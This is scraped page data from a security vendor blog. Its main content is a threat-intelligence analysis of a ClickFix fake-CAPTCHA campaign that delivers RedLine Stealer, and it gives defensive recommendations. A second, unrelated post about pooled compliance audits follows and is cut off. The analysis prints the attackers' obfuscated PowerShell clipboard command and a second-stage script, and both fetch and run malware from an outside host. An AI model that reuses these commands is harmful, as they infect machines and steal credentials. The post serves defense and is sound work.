Tom Simpson is a Staff Detection and Response Engineer within Okta’s Defensive Cyber Operations team. Tom has spent a decade in the security industry and is an expert at intrusion research, incident response and engineering of secure systems, which he’s demonstrated at Okta, TikTok USDS, CrowdStrike, and in the Australian Defence industry. Tom currently holds the GSEC, GCIH and GREM, having previously volunteered as a SANS teaching assistant. Tom enjoys researching the latest trends in Adversary tactics and sharing his findings through security research blogs and conference talks.
"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/3VujFHUQZHBWCS8daKbTqt/f45bcc7567e72a12143e3a673ad6d843/Tom_Simpson_Headshot.jpeg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#080808","width":58,"height":58}}},{"name":"Daniel López","slug":"/hackers/daniel-lopez","jobTitle":"Cyber Threat Researcher","id":"22dea194-5ef2-5cfb-8c46-f89bf610a204","bio":{"bio":"Daniel López is a Cyber Threat Researcher at Okta, where he focuses on tracking threat actor activity and the evolving threat landscape to best protect Okta’s employees and customers. Prior to joining Okta, Daniel worked at international companies across the consulting, financial services, and technology sectors. He enjoys participating in trusted infosec groups, continuously learning (both tech and non-tech topics), and staying physically active.
"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=58&h=58&q=50&fm=png","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=15&h=15&q=50&fm=png 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=29&h=29&q=50&fm=png 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=58&h=58&q=50&fm=png 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/5TRBUU3rk3GJGj4L5naq6U/47bc1a7014e29ab8e1407dadf672ab20/Daniel_Lopez.png?w=116&h=116&q=50&fm=png 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#182828","width":58,"height":58}}}],"title":"How this ClickFix campaign leads to Redline Stealer","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"ClickFix campaigns exploit user trust and problem-solving instincts to bypass conventional security measures."},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An overwhelming share of the user credentials that are later abused in identity-based attacks arise from the compromise of unmanaged user devices. “Infostealers” are the generic name given to the class of malware designed primarily for this purpose in mind. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While infostealers are distributed via numerous means — with pirated games being high on the list — more recently, our analysts have observed malware being distributed using deceptively simple techniques: a ClickFix campaign.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Often referred to as a \\\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Prove You Are Human\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\\" campaign, a ClickFix campaign exploits user trust and problem-solving instincts to bypass conventional security measures.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Convincing a user to install malicious code\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the ClickFix attacks we’ve observed, attackers pay search engines to elevate their phishing pages when users search for the names of popular web applications. The sponsored link redirects the user to a website that impersonates the brand in question.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These deceptive pages will mimic legitimate security checks, such as CAPTCHA challenges that are used to prove whether a site visitor is interactive (vs a bot). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These fake CAPTCHA or verification-type overlays lend legitimacy to the subsequent instructions provided to the user. The page might even subtly mimic the background image used in a real CAPTCHA service to enhance its credibility further.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here’s an example of a site impersonating a Cloudflare CAPTCHA challenge for a user attempting and expecting to visit Okta at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://www.asqula.com\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"www.asqula.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\":\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6JznFdLiy4AKckMpqdtZOZ\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nOnce the unsuspecting user interacts with this page, specifically by selecting “verify you are human,” they’re presented with a set of instructions designed to trick the user into downloading malware. Two versions are provided below: one targeting MacOS users, and the other targeting Windows users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"gMxEFxg9SQKs0BmpTyUWY\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"75QgUme0sVyjLzh0UoCV8s\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nThese instructions commonly direct the user to perform the following actions:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Press Windows Key + R\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (to open the Run dialog box).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Press CTRL + V\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (to paste a command).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Press Enter\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (to execute the command).\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Crucially, the malicious website uses JavaScript to hijack the user's clipboard, silently placing a PowerShell command onto the clipboard without the user’s knowledge, such as the example provided below. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"powershell -WindowS HIDD -c $E='23-ykfgoed8wrvnmj49xlq/pi17bh6t0zau5c.:s'; $ix=$E[24]+$E[12]+$E[15]; $JT='ht'+'tp'+'s:'+'/'+'/' + $E[7]+$E[4] + 'tahu.org/s.php?an=1'; $wF=$E[24]+$E[8]+$E[19]; &$wF (&$ix $JT);\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this case, the PowerShell command was obfuscated, and once executed by the user, calls a site which contained the following malicious code: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"$GDSGFBKSD = [System.Guid]::NewGuid().ToString();$env:MYAPPDATA = (Get-Item $env:APPDATA).Parent.FullName;\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Invoke-WebRequest \",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"hxxps://oktahu\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"hxxps://oktahu\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"[.]org/s.php?an=2 -OutFile $env:MYAPPDATA\\\\$GDSGFBKSD.zip\",\"marks\":[{\"type\":\"code\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" -UseBasicParsing;Add-Type -AssemblyName System.IO.Compression.FileSystem[System.IO.Compression.ZipFile]::ExtractToDirectory(\\\"$env:MYAPPDATA\\\\$GDSGFBKSD.zip\\\", \\\"$env:MYAPPDATA\\\\$GDSGFBKSD\\\");$FHBYREYDBYFB = Join-Path $env:MYAPPDATA $GDSGFBKSD;Set-Location $FHBYREYDBYFB;Start-Process Autoit3.exe launch_traffic4.a3x -WorkingDirectory $FHBYREYDBYFB; Start-Sleep -Seconds 5; Start-Process Autoit3.exe launch_traffic4.a3x -WorkingDirectory $FHBYREYDBYFB;\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This code initiates the download and execution of additional malware stages. The PowerShell script downloads a .zip file containing a malicious AutoIt-compiled script, launch_traffic4.a3x, and a legitimate copy of the AutoIT3 execution binary, Autoit3.exe. The malicious script is executed and acts as the initial stager, initiating a complex execution chain.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The infection proceeds as follows:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Initial Launcher\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": The executed script spawns a binary Swi_Compiler.exe from the %TEMP% directory.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Persistence:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Swi_Compiler.exe then copies itself to C:\\\\ProgramData\\\\fastpatch\\\\ and executes from there, establishing persistence by creating files in both %APPDATA%\\\\fastpatch\\\\ and %PROGRAMDATA%\\\\fastpatch\\\\ directories.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Loader\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (HijackLoader): Swi_Compiler.exe has been identified as HijackLoader, a loader known to employ various evasion techniques. Its configuration includes injecting %windir%\\\\SysWOW64\\\\pla.dll into processes.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Information Stealer\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (RedLine Stealer): HijackLoader proceeds to drop and execute OmegaDynami.exe and XPFix.exe. OmegaDynami.exe is identified as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"RedLine Stealer\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", a prominent information stealer available on underground forums. RedLine Stealer focuses on harvesting sensitive browser information, including saved credentials, autocomplete data, and credit card information from Chrome, Edge, and Firefox. It also collects system inventory data (username, location, hardware, security software details) and attempts to steal cryptocurrency.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Process Injection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\": OmegaDynami.exe (RedLine Stealer) exhibits sophisticated process injection capabilities, creating threads and injecting Portable Executable (PE) files into multiple Chrome browser processes. It also performs memory mapping operations on Chrome processes with read-write permissions and modifies thread contexts.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How to prevent ClickFix campaigns\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These attacks rely on the assumption that many users don’t understand the risks of executing commands delivered from an untrusted party. They just want to comply with the verification request and get on with visiting what they thought was going to be a legitimate website. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Windows administrators can and should consider allowing the execution of trusted, digitally-signed PowerShell scripts on managed devices and deny all others. MacOS administrators should ensure features such as Gatekeeper and System Integrity Protection (SIP) are enabled to protect critical files and processes. Additionally, preexec hooks can be configured within command and scripting interpreters to display a warning confirmation before any interactive command is executed.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Standard perimeter detection controls (email and web filtering) can prevent users on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" devices from accessing \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"known\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" malicious sites. Relying on these defences assumes the malicious site is live for long enough for reputation services to catch on. Unfortunately, they don’t do much to prevent users on unmanaged devices, which are more often than not the devices infected with infostealers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For this reason, we recommend restricting access to sensitive applications to devices that are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.asqula.com/oie/en-us/Content/Topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by Endpoint Management tools and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.asqula.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"protected by endpoint security tools\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". That way, you can be assured that the session tokens for highly sensitive apps are less likely to get scooped up by this commodity malware. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has published a \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/product/okta/clickfix-campaign-targets-okta-brands-drops-redline-stealer\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"detailed adversarial breakdown\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" of this ClickFix campaign, including Indicators of Compromise (IoCs) exclusively for security contacts of Okta customers at \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/product/okta/clickfix-campaign-targets-okta-brands-drops-redline-stealer\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.asqula.com\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"}},{"updatedAt":"2026-05-18T01:22:01.883Z","slug":"/articles/2025/06/paving-the-path-pooled-audits-with-okta-security","node_locale":"en","date":"2025-06-25T00:00","secAuthor":[{"name":"Lydia Le","slug":"/hackers/lydia-le","jobTitle":"Associate Analyst","id":"fa04ab47-82af-5c37-83c0-2a2a861a79f8","bio":{"bio":"Lydia Le is an Associate Analyst at Okta, providing Assurance support to the Security Customer Trust team. Her commitment to continuous learning and keen attention to detail supports Okta’s mission by securing digital Identities and strengthening customer trust. Outside of work, Lydia enjoys reading, traveling, and exploring new cuisines - always eager to broaden her horizons and learn differing perspectives.
"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/4UqwT1r4PKuCRxpLI1bACF/6f9650ead38a1cc0785134df4f3c0ab5/profile.jpg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#c8c8c8","width":58,"height":58}}}],"title":"Paving the Path: Pooled Audits with Okta Security","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"Okta has completed another pooled audit, leading the industry by transforming traditional one-to-one assessments into a collaborative, industry-first approach. This new model not only streamlines the audit experience but delivers impact: 90% of participating customers reported significantly greater confidence in demonstrating compliance."},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta has completed another pooled audit, leading the industry by transforming traditional one-to-one assessments into a collaborative, industry-first approach. This new model not only streamlines the audit experience but delivers impact: 90% of participating customers reported significantly greater confidence in demonstrating compliance. This new, collaborative model builds on the foundation we've detailed in our previous \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.asqula.com/hackers//hacker/tushar-badlani\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"posts\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" of the Customer Trust series, which cover our team's mission, mandate, and more.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Expanding our Program\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-1\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Routine, individual audits have remained crucial for building customer confidence and fostering strong relationships. In order to address the inherent time and resource demands of the traditional one-on-one model, we've introduced an innovative pooled audit program designed to work alongside it.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our Customer Audit program directly reflects the \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"Love our Customers \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"core value and is a testament to our \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.asqula.com/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"long-term commitment\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" to lead the industry in the fight against identity-based attacks.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To support our global customers, we’ve launched region-specific regulatory support, starting with the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/05/a-guide-to-dora-compliance-with-okta/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Digital Operational Resilience Act (DORA)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" in the European Union and United Kingdom and, more recently, the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.apra.gov.au/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Australian Prudential Regulation Authority (APRA)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" in Australia. As regulatory expectations around cloud service providers continue to evolve, these collaborative audit sessions are helping us proactively meet customer needs while setting a new standard for partnership and trust at scale.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Program Benefits\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-1\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta is leading the charge in elevating confidence and clarity across the evolving regulatory landscape. Our program establishes a new industry benchmark, paving a fundamental shift in the collaborative dynamics between critical technology vendors and customers. We bring multiple industry-specific customers into Okta offices for multi-day, hands-on sessions to collectively assess our controls against specific cybersecurity regulations.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In our most recent pooled audit, we thoroughly covered Australian Prudential Regulation Authority (APRA) expectations with our Financial Services Industry (FSI) customers in the region. The nine key domains that were covered included:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"BCP and Operational Resilience,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Datacenter Security,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Third Party Risk Management,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Enterprise Risk Management,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Physical Security and Identity Access,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Change Control and Configuration,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Cryptography,\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Vulnerability Management, and\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Security Incident Management. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"ordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The result wasn't just a compliance checkmark — based on the feedback captured, \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"90%\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" of participating customers left with significantly higher confidence in their ability to demonstrate their organization’s compliance to the APRA regulation. Since launch, we’ve realized the following program benefits:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Fostering Trust \",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This one-to-many model eradicates the heavy resource 